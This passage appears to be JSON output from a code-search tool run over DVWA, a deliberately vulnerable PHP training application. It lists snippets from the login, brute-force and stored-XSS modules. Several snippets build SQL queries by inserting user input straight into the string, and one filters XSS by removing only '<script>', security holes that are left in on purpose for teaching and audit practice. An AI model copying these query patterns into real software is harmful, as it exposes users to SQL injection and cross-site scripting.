class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">mysql_close</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> }",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 303,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">16:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"highlight\"><span class=\"line-number\">21:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">:</span>message<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">:</span>name <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':message'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':name'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">26:</span> }",
"line": 21,
"start": 16,
"end": 27,
"severity": "unknown",
"note": ""
},
{
"id": 307,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token string\">'$message'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'$name'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">mysql_close</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> }",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 311,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<script>'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token string\">'$message'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'$name'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">mysql_close</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> }",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 48,
"file": "/home/chris/src/DVWA-master/login.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">28:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> !<span class=\"token operator\">=</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">29:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"First time using DVWA.<br />Need to run 'setup.php'.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \t}\n<span class=\"line-number\">32:</span> \n<span class=\"highlight\"><span class=\"line-number\">33:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user<span class=\"token operator\">=</span><span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password<span class=\"token operator\">=</span><span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">34:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> @<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.<br />Try <a href=\"setup.php\">installing again</a>.</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> { <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Login Successful<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">36:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"You have logged in as '{$user}'\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">37:</span> \t\t<span class=\"token function\">dvwaLogin</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">38:</span> \t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 33,
"start": 28,
"end": 39,
"severity": "unknown",
"note": ""
},
{
"id": 68,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get users details\n<span class=\"line-number\">24:</span> \t\t<span class=\"token variable\">$row</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_fetch_assoc</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 19,
"start": 14,
"end": 25,
"severity": "unknown",
"note": ""
},
{
"id": 80,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> 